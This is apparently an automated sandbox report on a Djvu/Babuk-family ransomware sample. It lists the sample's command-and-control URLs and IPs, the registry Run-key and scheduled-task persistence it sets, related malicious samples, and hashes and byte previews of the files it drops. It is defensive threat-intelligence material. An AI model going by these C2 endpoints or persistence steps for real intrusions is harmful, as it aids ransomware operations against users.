          http://cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4file.exe, 0000000F.00000002.3354114917.00000000007EA000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dfile.exe, 00000007.00000003.2762141531.0000000000902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2764074293.0000000000902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2762877156.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763919794.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2763042537.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.000000000084E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.0000000000838000.00000004.00000020.00020000.00000000.sdmptrue
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.google.com/file.exe, 00000007.00000003.2336759668.0000000003370000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          109.175.29.39
          cajgtus.comBosnia and Herzegowina
          9146BIHNETBIHNETAutonomusSystemBAtrue
          188.114.96.3
          api.2ip.uaEuropean Union
          13335CLOUDFLARENETUSfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1494419
          Start date and time:2024-08-18 13:26:55 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 8m 44s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.rans.spre.troj.spyw.evad.winEXE@18/1329@4/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 28
          • Number of non-executed functions: 192
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadFile calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Report size getting too big, too many NtWriteFile calls found.
          TimeTypeDescription
          07:28:05API Interceptor1x Sleep call for process: file.exe modified
          13:27:54Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe s>--Task
          13:27:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          13:28:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          109.175.29.39file.exeGet hashmaliciousBabuk, DjvuBrowse
          • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
          xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
          • dbfhns.in/tmp/index.php
          file.exeGet hashmaliciousBabuk, Djvu, PrivateLoaderBrowse
          • cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
          SecuriteInfo.com.Win32.RansomX-gen.4067.126.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoaderBrowse
          • trmpc.com/check/index.php
          7vMi37TpMO.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
          • kamsmad.com/tmp/index.php
          kCJQaJf3Vs.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
          • trmpc.com/check/index.php
          file.exeGet hashmaliciousBabuk, DjvuBrowse
          • habrafa.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
          nJa31W9P4p.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
          • cbinr.com/forum/index.php
          vegpadg6oW.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
          • habrafa.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
          rR15ofOPl3.exeGet hashmaliciousLummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLineBrowse
          • habrafa.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
          188.114.96.3Injector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
          • 753139cl.nyashtop.top/PythonPhpPollProtectTrackcdnUploadsDownloads.php
          set-up.exeGet hashmaliciousCryptbotBrowse
          • neintyy19sb.top/v1/upload.php
          set-up.exeGet hashmaliciousCryptbotBrowse
          • neintyy19sb.top/v1/upload.php
          rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.xlsGet hashmaliciousUnknownBrowse
          • jiourl.com/anbdld
          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • filetransfer.io/data-package/9sUie4yY/download
          PRODUCTS SHEET 0051937.exeGet hashmaliciousFormBookBrowse
          • www.ediancai.cn/x7r2/
          RFQ-180624.exeGet hashmaliciousFormBookBrowse
          • www.ediancai.cn/x7r2/
          http://proph.co.ukGet hashmaliciousUnknownBrowse
          • proph.co.uk/blog/
          7092832738283792.exeGet hashmaliciousFormBookBrowse
          • www.coinwab.com/kqqj/
          g45zz6J4tL.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
          • 376294cm.n9sh.top/JavascriptprocessorAuth.php
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          cajgtus.comfile.exeGet hashmaliciousBabuk, DjvuBrowse
          • 58.151.148.90
          file.exeGet hashmaliciousBabuk, DjvuBrowse
          • 109.175.29.39
          setup.exeGet hashmaliciousBabuk, DjvuBrowse
          • 211.181.24.133
          setup.exeGet hashmaliciousBabuk, DjvuBrowse
          • 211.181.24.133
          setup.exeGet hashmaliciousBabuk, DjvuBrowse
          • 175.119.10.231
          setup.exeGet hashmaliciousBabuk, DjvuBrowse
          • 181.204.98.226
          setup.exeGet hashmaliciousBabuk, DjvuBrowse
          • 190.12.87.61
          TfsbrHNaOX.exeGet hashmaliciousDjvuBrowse
          • 78.89.199.216
          Nlwkg1ycJ4.exeGet hashmaliciousBabuk, DjvuBrowse
          • 78.89.199.216
          XQpBmNRd7j.exeGet hashmaliciousDjvuBrowse
          • 190.224.203.37
          api.2ip.uaC0XWmZAnYk.exeGet hashmaliciousBabuk, DjvuBrowse
          • 188.114.96.3
          284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
          • 188.114.96.3
          file.exeGet hashmaliciousBabuk, DjvuBrowse
          • 188.114.97.3
          setup.exeGet hashmaliciousBabuk, DjvuBrowse
          • 188.114.96.3
          e8997f96b91ab5ea1fed555a7d62369a8307b0cfcbd0e32c5e9a7e430ab42240.zipGet hashmaliciousDjvuBrowse
          • 188.114.97.3
          A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
          • 188.114.96.3
          DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
          • 188.114.97.3
          E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
          • 188.114.96.3
          FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
          • 188.114.96.3
          F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
          • 188.114.96.3
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 104.21.42.119
          file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, zgRATBrowse
          • 104.21.42.119
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 104.21.17.213
          update.bin.exeGet hashmaliciousUnknownBrowse
          • 162.159.129.233
          host.bin.exeGet hashmaliciousUnknownBrowse
          • 162.159.129.233
          visabuilder.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
          • 162.159.135.233
          https://innovex.sa.com/Ddvsw/#3Ym9hel90QG9wdGltb3ZlLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          uxx8jvvSHl.exeGet hashmaliciousLummaC, CryptOneBrowse
          • 172.67.166.231
          Wpzyo4HhR7.exeGet hashmaliciousLummaCBrowse
          • 104.21.16.74
          1wM0OWBdv5.exeGet hashmaliciousLummaC, CryptOneBrowse
          • 104.21.16.74
          BIHNETBIHNETAutonomusSystemBA77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elfGet hashmaliciousMirai, MoobotBrowse
          • 92.36.229.172
          file.exeGet hashmaliciousBabuk, DjvuBrowse
          • 109.175.29.39
          Pi6fnXmVmd.exeGet hashmaliciousSmokeLoaderBrowse
          • 92.36.226.66
          ahN4x3ahps.elfGet hashmaliciousMiraiBrowse
          • 195.222.62.190
          file.exeGet hashmaliciousSmokeLoaderBrowse
          • 92.36.226.66
          er8xK60DM8.elfGet hashmaliciousUnknownBrowse
          • 109.175.65.244
          7ZEAQv0SZ6.elfGet hashmaliciousMirai, MoobotBrowse
          • 31.176.168.187
          xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
          • 109.175.29.39
          2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
          • 31.176.197.47
          1.exeGet hashmaliciousPureLog StealerBrowse
          • 92.36.226.66
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 188.114.96.3
          file.exeGet hashmaliciousLummaC, VidarBrowse
          • 188.114.96.3
          file.exeGet hashmaliciousVidarBrowse
          • 188.114.96.3
          update.bin.exeGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          host.bin.exeGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          MLNxjQiHLg.exeGet hashmaliciousCobaltStrikeBrowse
          • 188.114.96.3
          Po docs.docx.docGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          Payment advice.docx.docGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          inte.exeGet hashmaliciousGCleaner, VidarBrowse
          • 188.114.96.3
          SecuriteInfo.com.Win64.MalwareX-gen.18212.13325.exeGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          No context
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):42
          Entropy (8bit):4.898153434632013
          Encrypted:false
          SSDEEP:3:9DEjEvxINsf5vN:2jGxssZN
          MD5:2F719FDBD51BE742A58ED1711E35125E
          SHA1:AFCE4C99F6312EB37637FF7EE5E24C5F77F59AD3
          SHA-256:FA22FEA720A688CDD5B304427090FA95C4BE20E928B5E0170B3F15CEDA8CEDFE
          SHA-512:AACF91A25A6C5D3288F9E778583FDC163CB023345C3E8925BF56FDFC0B429E864A356AA9A07723E17DD9CA9417E9856C875AB02FBD775C4E6B700D03EAC49C08
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5..
          Process:C:\Users\user\Desktop\file.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):795648
          Entropy (8bit):7.478589132226232
          Encrypted:false
          SSDEEP:24576:aG18MH/r+RAIFqLN7/uW/Nau09jMxrc5N:3aMD+RANBKIJ09j
          MD5:006EDF0AC466164DDC9E0AC56474FE0A
          SHA1:EE9F512713AF63759F11279090D2C8004762735B
          SHA-256:D343EA857CDF97AA0CCFD14970425C6888BD216D36AD7F6255A044BED36A4B2A
          SHA-512:43305369FEA2DAD52D51BC9D5947A2F7E78D33BAADD07093C250B9EB1FD3762C511033BBFAE2B8D6EB52254306D137E29CD15E0B30B0F6D44A9D4F3D12B8B808
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 34%
          • Antivirus: Virustotal, Detection: 36%, Browse
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................................F...............................Rich...................PE..L......e.................@..........~........P....@..........................0.......e.......................................f..<...................................................................c..@............P..h............................text....?.......@.................. ..`.rdata..L....P... ...D..............@..@.data........p.......d..............@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:true
          Reputation:high, very likely benign file
          Preview:[ZoneTransfer]....ZoneId=0
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):818
          Entropy (8bit):7.74434647210839
          Encrypted:false
          SSDEEP:12:YKW6zk/tABITq5aYFKTONLh5x2S2POLeR88LUyVLNa47EyTKuO+fsvWM9TixpZaX:YKWzWKiaYdxASqMeu8QoptbrQiTkbD
          MD5:7CBD0EA2E82DC6468CAE83983B91EA5F
          SHA1:83F05FC383914E86A2A50FAE305F27AEF6945C44
          SHA-256:D4A5E8A893284911DC79C69F86ED3168282CD4835135739E4FD1596E9173F47F
          SHA-512:9393490E5719EEC7F0EB41DCCF6435CEAD16B1F87F572ADBB5246F1D1CC7CB0577BBD3972527609ECC9F93876FDEB1D2E76F0A87FDA8601822C1B005BDDA9106
          Malicious:false
          Reputation:low
          Preview:{"os_A.r...xx...B.......:dD..Coz{..........D/?.....M[.X...T8C%.....3.d..H.....;.c.......ck......<.....b,n.........wq.....`........3......b..kA6.d.H9P..A. ~...m>NV.].k..Ut..Z..>L{.......!..d...A..p..M......"....t`~8....8?....d..pOV.R........._..0#...we.83..d..a.c.<...+f....*.{vEb<].0.f.*...w...?."f..p.....9.&..F.*..(8.\.l..!....wJ40..X'3...=.Z4...(..0......V!.....?Z.q.D..2c......9.....Kir..r...-.n..7..d.D.....5r..[../N. .r.t.9\.?p....^lO`..o......T..S{\/,.s30.....F.#.j.]....v.{.Z.G.(04..#q....*2.#. .Y..w.B(....<B...........i.j...#5....F%.r..}...k...v.3../Ne..Zod......b%"..-.U..R...~Cl.?[.%.l..?..X.K..LSh.....p..f.7....ZF<p.@"6. ;.....p....Pp$..7..l..8. ..E.Yt...!G}.wUl3......"...G^...}.....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1483
          Entropy (8bit):7.875312481685922
          Encrypted:false
          SSDEEP:24:Wkjfoz5F4kCZty8Jhs9Y2yerFFfnMz3EQQqUhbcmwSWPJnFuWmxgSxzITnKp/9TN:WtzCh3s2eBN3amwjPuW0NFITnKx9uiD
          MD5:56D4F44A32430AF34C61D26A13E356C0
          SHA1:335DAC71020F458F1F20DD06EF9CB22392D98B7B
          SHA-256:A253469BF9069D396B75E91F56348A5C3CB510ACEA93A536BBDD097454953713
          SHA-512:62082849EB02DD479D831EEF502C8F9ADC39C04C6CA5DB4A3A334D9A407E85D2CF580F86F72620FC71DF83FCCB15FAE3F03137283F214F89AE769F242C8747C8
          Malicious:false
          Reputation:low
          Preview:*...#t....T.........~a.......Zp.[..+..~...J.>.n.|q..@.sV...8.Ow.....<.w......<..3..y...H.....!..dr.!.....H...D\..V.o.N.;.?...[.^.8...CG;0...T.{...4...a.J;..:M.I.7..wJi>y5.^.D'aK.mk..z._n].vP.Kz.f2.f..H...'..'....ul...........Q.7#iH..o...H.....8.<...5..a..acM.CJS........v.~B.,.5...{.e.,q,...?v$..y....DF..Hv~..R.P.....n..Q.j...z._...i5v~.Ls.(..c.J.....k..;.....0iD...(.....lO.d...8D..L.).}}-.AO..Q...X..$;.Ksgv.p..Z.T..@......E.....V.1k4]pDu.x..&.f.Z..{\{...Xe..!.4Ul-...?q..f...mT..H.W5.S.S^.....A...xX.....4/.\....B.@7..G..?.k.X..*..n&.9qTP.-....(.t/n......!..T@....b.0f...^..HW........./..3..I<.."`..._.../.^.R8Fh.4.....Z...{..=..]..=..2......IL U..z.t.Zt. @0.d}..>?.]3.....GIG.MA.dE..I.O.K...dX.....r.(..TuGH.Q,.\......,<=...D.*c.wu.V....Q....\...g-Y..n/.........s...A......x..;.D..22...$8jA....&..V....8.4J].I....4u.=:f..krV'Si4..s$NM,C/.......Q........d8..=`....a.....&X0Y.u...g#.......4.[.Y..R.bss.:.L..KB....X........d...|..Z~......QPW....
          Process:C:\Users\user\Desktop\file.exe
          File Type:PostScript document text
          Category:dropped
          Size (bytes):1567
          Entropy (8bit):7.884921285746454
          Encrypted:false
          SSDEEP:48:hPtA1BfWzUSB3oPSJrLCmkEcXegScysiD:ltA1UznmPStFkEiBE
          MD5:A57ED7BE5D10B9D0D8C09C9587034813
          SHA1:8B865C4D14DEDB3D06CF670C41E5DEE263248CCF
          SHA-256:EE4BBA1949763AC203AB6EC20446743AEA07A81BF46E471F48B60F797B16A56B
          SHA-512:4A53A88940C3245EC8B66E5542F5B94AC985807BC86EE3732960AE4B31A90F427B34A66D1741646E3D6ED7E7DAC52C57018C3D729D48DD096304F3CE7671B599
          Malicious:false
          Reputation:low
          Preview:%!AdoR.N...B..UH ...~_f.......Om...g..gJ....n....B..i..$.G..V.....2p .v-u*......T...$Q../.e...s..f..(.l.S....04.H:.'.z...%.w.D.....1....s...4.@...J...l.........QN..;..._...{oo.p`{i3..T...7N6.K..#..u%.Z.y....!=dX.H.o...u.....n.g"|..2..V...U..........I.u.*h.....<.....6....kl.qLf58.=.WT.......U.y.fO.z..7...99.!..ln.|.....`r..g.sq.6.2".h=%...4.guM.\c.......O...P...H..B.j$..7..|b.VI...#....|R....Vu._x.S.....k.&.gYe..3".g..{....k....>......G..#..,.:."......,.....2k&..........4 nE..F.h*.D.;..I...lw3?|...K.>]du..........T.....g.O...v'mu..w...u_..o..U....c...i.E}..~.d$..*c..5..........v.r~.q.\.......}y6!.^....%_.N.|..{w..;K...8.e........VO....../L....A.o...%...3..]K...a..q.2...;....l..9Lz..}.....I.Hf..+. M...}^...h...|vU.......'..wL.Z..2..@..X.&.....<.3....b..@.V..jg=.X.....c..{.:.{.5..tR..T.-......{!d..{Q.1Y..4(.G.!z.H0.z..{9.o...|X5r.....p-Ce.#2...N.[B/3...76.........!...........}.B..In~:a.].+.,[.52...w.3T_.T..,.)r.....o.B..*.t.3#..P.......
          Process:C:\Users\user\Desktop\file.exe
          File Type:PostScript document text
          Category:dropped
          Size (bytes):185433
          Entropy (8bit):7.877389152330127
          Encrypted:false
          SSDEEP:3072:b3sRNxzN/JpVkFXZQ3efHA1E7LRiBR0DylrzBYDHIZPILFfwVaxivhXE07Zmandq:j4T/Xep5g1qLGJlpFGFriXE07ZmandGD
          MD5:C81D315F39C61DFE4AC7D7BCA17D11B6
          SHA1:47833A774BB8619D91496D0DB3F5957DD2C18AE0
          SHA-256:E458833DCB33773FB7CA11C1021A8980466183F446A34FFF62EDE23AAD3702C0
          SHA-512:EDBF2941C11220654AE5EE5DE427410DF1D693B7C4A7489EE047403835612D03A2566C490D8A10BA829BEEC34CD6A96942B5E6D0516344F60B5D373A93417206
          Malicious:false
          Preview:%!AdoM.sfy....,......A.......X..l..D-...-....eF..N....@:.qE.8....mU..5.2..x....{Y[f&...T.....W.aJ`.....G.+2|'..y..9.$.#G/0..d......$`.X..(.1/.T..!&.I\...N.._......io....Q.f..@u[$-..{.%.k0....j...o..C.*b].|R,.....` ..m.u^....`..+...z.j.@...r.a.G.FnKcI...H.....p.},.^6th..c.0d.P._..$@.%%..F.1N....2.3J.n.$.f....\I..t........&..H..Zc...aV.L%..I0..RY.,..;$x."m..?.._.N..e.ek.}.V.c._u#.-....j9l.h.%..J*.#v.........s.l..h.T..wE.t...q..SK+Y..$....V..A..w^.]a..<...D.h.Ge............^XR.?.#\.....,..$..}9..UQ%A.bK....$..@......Ua6.H...=.xfw.......2....;...4....5..N.F5...u..8..Q...".<.mO...y...K.D0.S6~.}+...H.t..U..."n7..]).<..t%B.jC..~.Y..Y..9..w{ao.D....I.A... .../q...... ....G...i.....d1.S....YI.....g]e.L.Wj|}....b.d...S.)..MM/.>...k.<q...|....qWz;....^...?.qX..4....@.^..j...8}...3Q....{..T.).wl.^lg.@..5_<....M+..67...z....U7..9r...O..fs...."........^.9.7.....M...I.(..W8u...:9@.v}y,...!..BG...N...4.......|..B.Zk....:.\.T).O.5.B.i..V1..6Pp. ....\u!?
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):227336
          Entropy (8bit):6.985669375622378
          Encrypted:false
          SSDEEP:3072:JQ1iEI4e+vZWkSdsQlkj3DWrwO4cR1gX2U7rgSFkhtTmOoWiRnw:SupQDe54cR1gGoV7nw
          MD5:A863A6EC506082540B66FBAD5236BF90
          SHA1:62FB944B62E35FCD3925766418AA40679A9472CC
          SHA-256:5687F8926468A112CB0177A2211069BE43886EE360A5D175FECE31D43B8043DF
          SHA-512:1BF0C711269C3DEFE5F6236133140683148874F375C532C5C0D8CA0845892872733278D06722E48BFB1099ADB2EED64896A27B12572DA19503CB4DB334E6DB3D
          Malicious:false
          Preview:Adobe.*...`.`....@.3.-y.~h.H?i......(.sP...Re}..=.kI%K.0...1..To.>.E..xB.#../H..X....O.!3+.........(Z.jnuRDl. .-.....Q..d..6..2....S.2.}t..K.V+....9..].I.G.|..80HM.M........O...Q..)..io-..r.3...S...Yp..:....P.x.n.?.._......A.*r.o.x....h..k.?_......I.}q(...*..-w.....0..F.h&{ ...;.E+.....?m.N...W....C.|S.}..F;..r.S.ydC]C......2Lp....&.....YXJ..~%L6.....0._Y..i.cI..$.-.Z..j.v&>./..C.T.N|.Y.R#..z.0..i.......1.=-....l.y_....q..kD..H..!..&.H..-*........'..d=....!..|.x^..[....gNfP......Z...}....H....r....W..g......w2"u!$....K vr..P.....^..3....q....\f.H V.....mY.........(....~x..E..S.yr....#.2......bt.J..x3;} .1.....(.|...$...>!..,.im<....v......I+T..........'...)Yj.,..6..'....4....X.Q.pI.M..&X1......\$....YW.O..Ch...,..Z.6"...K. oCy...}.....""..tz.1Y[....]1..Fi:.;...P.>...U..Tc.*..e..T~..a..s...[`)..%.5.....M.o...B..@.ex..a>V..x.....`...O..g#...s...a8w.a._......d........./L)T..9.......0..........uA.t.....z.Y..H.....n..C*Q......VRo.@N..vWZ..i.g.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3152
          Entropy (8bit):7.932654555246764
          Encrypted:false
          SSDEEP:96:ONwC+/1UcTluaDd48ekWIVm8vEy+5pU2xDUi:OP+ScTvd4dII8vEy+j7p
          MD5:67D8A92D59792C201EACFF3F738B6E0F
          SHA1:C6832D26AFF9998721A25DEE571E7844F5EA43A6
          SHA-256:4E1D5F07735E3973DE49A09E7E2A4EA39ABFF60A0C41328F8A5B5C6FF5D364C1
          SHA-512:383C90D53F448A93C16FCFBEC4821859AA6180F5E370256E86C6FC7A5263D350636598B7BA9755B486F100E732C0BC85485E24926E86A1014F3C035E8A53F453
          Malicious:false
          Preview:{"allv..1.....r...9...7..T.qA|..........[.X...}...a..]qK.x..E..(o.xd.K.3t...o.8...sC.`.,/....1-...].Pv.GI.........Mu#...*..Vd..'>C.%.rg...#.)q.....Sc.$[O.U.z.w..(:et.h. TSmc.>...n.....B......1....!..I...O...!..G2....6s..'..:........al..?3....g.+..T..ryj. D.!.:I..o}I...ce..P...xq...8.C.....a..mv.{..d@...1.....M..&....c.@...5....<0g\.f2.....Sje+...".Y.Vh.A.No.b.`H.k:.E-....W...[.=.'..nW.f..H.......l{...ZKi..GTRB.;..&V..2...h...yt..O<6M..4|Pw..&..6...g."i.lR.....x..&F..F...R2...80...d..........uI.9.z...~y .:.r+w.....O.yY0...;.....O...:...2.z.......W..l.M...._V..^}'...M.r...(...%.z.....X...ow6#..V...$..)....0......\..L.d...'d...K.\p......f..G...e!.m0..2.|.J.89.........&.d.Ga<....`0.95?..P.b..GR.I.{..6..`....*.{.R.......x4..A..Be..-<.J.eS.x..6.....X:N1......N.\.P...i.../Q...r...[jQ7...O]....Mu....).$.....C.`.H...1..T.]~....J9 ..vq8.y_l..c....?..q..a........z.D.IF..7....p/...X=...E.tU.l.L...Ex.n.i6H...w.s.......(..i...d.w.....h..T'h...d^.Z....5...x.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):67060
          Entropy (8bit):7.997170020021124
          Encrypted:true
          SSDEEP:1536:HdslFXs3cqzUfE9M9DzBLZAGTUPlwWFcpn4J5dwU:Hdsrs3cqzUF9XByFcy5dd
          MD5:9EE6303DD73510415C293C86EF52771D
          SHA1:F40942DFC7AA3F8A96AF8FB6E6C3227215F9D28E
          SHA-256:664ADAD28C15BBBAFAE1EDDA88656A525ED4BFB60868642266F7F85310E4BA7D
          SHA-512:D75EEC96C7F7B92782771C5B575AE00E01D0A5377F8662C3CF9C16151902B8F0F297ABB809A860D210997267F34BAA4924CA371089138B01811277818146BB5F
          Malicious:true
          Preview:4.397D>..U..d..$0.rY.h......n0.x...+6..&O..k4.........G.(=._..../e......+..o..f&so.......&.....6.....i...;...Q0......5..2..q.N\.;....m....?T.<r......`..m...~(..t K..A._0...H.."B.cg..(...={!.}=..F...E2../Q..s.[..........A.............`.........D.}..o..CS.>AhV.".....b+..?..k.Lwc...o.@.KY"..w....r...T.c.t%.13NV.-...{.'.#.....=.xC.Y.w=.v...%RE(......3.......d.7..P.....'..H*...rH2.Dw>!....*<..........m...h.....h.Z..S9Y..$E..dn...d...eA&....M;I...w....h'C./...o........p..T>[5.......h.!.._.!.]".vy.U....O....X...c...z.P.....).P..F..n+.A..S._.C...2..rizq..H(...4.c$.4......Z.6p...r,.[..4]1m.beQ.....I..t...8B..x.d~ko....^`..[.8p..L.4..dQ......>.o.I.......x.8...mMN.(IG...&a.....s%D.."...X.G.A.w.....6A.....U..&R..1J.p..30.N!..H...|.^..),.4M.........R.v....&.+r.ku..".v5B....k.Z..l>....I.gG8dy..XFvs..j.....:..X....T.../~.....%v..c.....l....mT}.6.\..........o.....k.n0...1...I....i.x.X".`.+.[.J<K..)....:...L......q.;82.....pZ..PoSK.......I...BSJ..J.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):486
          Entropy (8bit):7.528911716091331
          Encrypted:false
          SSDEEP:12:qMNLzYvVdBB2FZgUB5UOU3JzQkM2YsmHuZz4UlZZ/ixpZacii9a:8VdBB2U67U3JkR2YsmGznZJiTkbD
          MD5:7EF8BBFA3C4808D937B5D35161624A71
          SHA1:2E879D55FF0064FB6F4032168DB8F441AC81DAD0
          SHA-256:79F025681C86A451EDFCBFC358A09BB31C0C428EF0ED612B7FA73A4386DF96CC
          SHA-512:E1D20F5402B86B597622F70D18B8E0FBBD4C5C190E33FE92FD332CC7123166F5FC20B3D438DCC5698E0204C56DBC5558B209770353B0B54267F755E9E0B88B5A
          Malicious:false
